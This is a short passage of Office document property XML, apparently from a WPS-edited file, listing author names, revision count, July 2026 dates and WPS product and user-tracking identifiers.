  <CharactersWithSpaces>60511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Nhat</dc:creator>
  <cp:lastModifiedBy>THANH HAI</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-16T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-22T09:39:00Z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eyJoZGlkIjoiZDk3NTBlOGQ2MjI3M2ExZjJmNjE2ZWJjNzBiZWQ2N2YiLCJ1c2VySWQiOiIxMzkyMDA2MDM3OTk5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>E548BB852D09450C841026502CD5518F_12</vt:lpwstr>
  </property>
</Properties>
</file>